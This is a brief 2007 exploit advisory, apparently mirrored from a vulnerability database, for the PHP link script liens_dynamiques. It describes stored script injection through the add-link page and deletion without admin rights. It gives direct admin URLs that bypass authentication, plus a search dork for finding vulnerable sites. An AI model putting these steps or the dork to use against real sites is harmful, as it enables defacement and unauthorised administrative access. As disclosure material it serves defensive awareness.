Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15735
HistoryJan 17, 2007 - 12:00 a.m.

liens_dynamiques xss and admin authentification

2007-01-1700:00:00
vulners.com
22
  • liens_dynamiques xss and admin authentification

  • By : sn0oPy

  • Risk : high

  • Site : http://xentraz.free.fr/

  • Dork : "liens_dynamiques" | "liens_dynamiques2.1"

  • exploit :

       + inject any script on the add menu "liens.php3?ajouter=1", you cas del it without admin permission one the del menu "liens.php3?supprimer=1"
          
       + Be admin : 
               
                  http://www.target.com/liens_dynamiques/liens.php3
    
                  replace it by  http://www.target.com/liens_dynamiques/admin/adminlien.php3
                  or http://www.poew.com/liens_dynamiques/admin/modif.php3
    
  • contact : [email protected]

  • greetz : [subzero], Avg Team(forums.avenir-geopolitique.net).